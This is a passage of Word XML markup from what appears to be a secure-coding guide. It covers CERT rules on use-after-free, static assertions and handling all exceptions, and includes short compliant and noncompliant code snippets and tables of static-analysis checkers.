              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Library loaded from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rec. partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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95">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8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId29">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Do not access freed memory</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9">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9A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[MEM50-CPP]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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(The function </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">g()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> is marked </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">noexcept(false)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to comply with MEM52-CPP. Detect and handle memory allocation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0">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2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this compliant solution, the dynamically allocated memory is not deallocated until it is no longer required.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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Code should be designed so that dangling pointers are avoided.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C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D">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CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId30">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Clang</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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D7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clang-analyzer-cplusplus.NewDelete</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">clang-analyzer-alpha.security.ArrayBoundV2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Checked by clang-tidy, but does not catch all violations of this rule.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId31">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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DB">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1DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOC.UAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Use after free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId32">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Coverity</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">v7.5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USE_AFTER_FREE</w:t>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Can detect the specific instances where memory is deallocated more than once or read/written to the target of a freed pointer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId33">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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E3">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1E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CERT_CPP-MEM50-a</w:t>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Do not use resources that have been freed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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E8">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B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId34">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Use a static assertion to test the value of a constant expression</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C">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ED">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[DCL03-C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Static assertion is a new facility in the C Standard. It takes the form</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static_assert(constant-expression, string-literal);</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Subclause 6.7.10 of the C Standard [ISO/IEC 9899:2011] states:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The constant expression shall be an integer constant expression. If the value of the constant expression compares unequal to 0, the declaration has no effect. Otherwise, the constraint is violated and the implementation shall produce a diagnostic message that includes the text of the string literal, except that characters not in the basic source character set are not required to appear in the message.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It means that if constant-expression is true, nothing will happen. However, if constant-expression is false, an error message containing string-literal will be output at compile time.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Passes */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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static_assert(</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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sizeof(int) &lt;= sizeof(void*),</w:t>
            </w:r>
          </w:p>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"sizeof(int) &lt;= sizeof(void*)"</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Fails */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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static_assert(</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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sizeof(double) &lt;= sizeof(int),</w:t>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"sizeof(double) &lt;= sizeof(int)"</w:t>
            </w:r>
          </w:p>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Static assertion is not available in C99.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000205">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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This noncompliant code uses the assert() macro to assert a property concerning a memory-mapped structure that is essential for the code to behave correctly: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containing the assertion is executed.)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2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2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2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2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func(void) {</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assert(sizeof(struct timer) == sizeof(unsigned char) + sizeof(unsigned int) + sizeof(unsigned int));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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15">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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">For assertions involving only constant expressions, a preprocessor conditional statement may be used, as in this compliant solution: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(Using #error directives allows for clear diagnostic messages. Because this approach evaluates assertions at compile time, there is no runtime penalty.)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(sizeof(struct timer) != (sizeof(unsigned char) + sizeof(unsigned int) + sizeof(unsigned int)))</w:t>
            </w:r>
          </w:p>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#error "Structure must not have any padding"</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#endif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
                <w:between w:space="0" w:sz="0" w:val="nil"/>
              </w:pBdr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The use of automated testing via static assertions can be used to make sure the code does not have any security vulnerabilities when presented with bad or unexpected data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2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2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2F">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3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31">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32">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId35">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Clang</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">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3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">misc-static-assert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">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3D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId36">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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3E">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23F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(customization)</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Users can implement a custom check that reports uses of the assert() macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000241">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId37">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ECLAIR</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">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CC2.DCL03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000244">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45">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId38">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>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44 S</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Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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4B">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E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Handle all exceptions</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4F">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50">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[ERR59-CPP]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000251">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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[except.handle], paragraph 9 [ISO/IEC 14882-2014], states the following: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If no matching handler is found, the function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is called; whether or not the stack is unwound before this call to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is implementation-defined.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The default terminate handler called by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calls </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">std::abort()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, which abnormally terminates the process. When </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">std::abort()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> is called, or if the implementation does not unwind the stack prior to calling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destructors for objects may not be called and external resources can be left in an indeterminate state. Abnormal process termination is the typical vector for denial-of-service attacks. For more information on implicitly calling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see ERR50-CPP. Do not abruptly terminate the program.</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As per ERR50-CPP-EX1, a program that encounters an unrecoverable exception may explicitly catch the exception and terminate, but it may not allow the exception to remain uncaught. One possible solution to comply with this rule, as well as with ERR50-CPP, is for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to catch all exceptions. While this does not generally allow the application to recover from the exception gracefully, it does allow the application to terminate in a controlled fashion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">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C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this noncompliant code example, neither </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">f()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> nor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catch exceptions thrown by </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">throwing_func()</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. Because no matching handler can be found for the exception thrown,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is called.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66">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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this compliant solution, the main entry point handles all exceptions, which ensures that the stack is unwound up to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and allows for graceful management of external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Practice Defense in Depth</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279">
            <w:pPr>
              <w:pBdr>
                <w:top w:space="0" w:sz="0" w:val="nil"/>
                <w:left w:space="0" w:sz="0" w:val="nil"/>
                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
                <w:right w:space="0" w:sz="0" w:val="nil"/>
